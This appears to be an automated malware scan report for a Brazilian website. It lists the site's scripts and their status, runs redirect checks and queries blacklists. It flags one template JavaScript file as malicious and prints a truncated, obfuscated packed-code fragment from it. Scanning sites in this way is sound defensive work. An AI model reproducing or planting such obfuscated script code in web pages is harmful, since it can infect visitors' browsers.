Scanned pages/files
Request | Server response | Status |
http://ekosamazonia.com.br/ | 200 OK Content-Length: 49316 Content-Type: text/html | clean |
http://maps.google.com/maps/api/js?v=3.x&language=pt-BR&libraries=places&sensor=false | 200 OK Content-Length: 4531 Content-Type: text/javascript | clean |
http://ekosamazonia.com.br/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/plugins/system/rokbox/assets/js/rokbox.js | 200 OK Content-Length: 55151 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/templates/rt_hybrid/js/gantry-slidingpanel.js | 200 OK Content-Length: 1847 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(f(){2.H=8 I({J:[K,L],3:{p:M,q:\'N\',h:r.O.P.Q,i:\'R-S\',s:0,9:[\'T\',\'U\']},V:f(a,b){t c=a;a=W.j(a)||X;6(!a)Y;6(!a)k 8 l(\'"\'+c+\'" Z 10 11. :(\');2.12=a;2.4=a.g(\'#
Antivirus reports:
http://ekosamazonia.com.br/libraries/gantry/js/gantry-morearticles.js | 200 OK Content-Length: 1883 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/libraries/gantry/js/gantry-smartload.js | 200 OK Content-Length: 2815 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/libraries/gantry/js/gantry-buildspans.js | 200 OK Content-Length: 698 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/libraries/gantry/js/gantry-inputs.js | 200 OK Content-Length: 3880 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/libraries/gantry/js/browser-engines.js | 200 OK Content-Length: 4026 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/modules/mod_roknavmenu/themes/fusion/js/fusion.js | 200 OK Content-Length: 26565 Content-Type: application/javascript | clean |
http://ekosamazonia.com.br/plugins/content/jdownloads/jdownloads/lightbox/lightbox.js | 200 OK Content-Length: 12325 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ekosamazonia.com.br
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 26 Mar 2015 10:28:28 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: aaa256fe7a3f295408c6ae78efdd5302=7eabb5fe079c203a7be403de3c4fd281; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ekosamazonia.com.br
Referer: http://www.google.com/search?q=ekosamazonia.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ekosamazonia.com.br
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ekosamazonia.com.br/
Result: ekosamazonia.com.br is not infected or malware details are not published yet.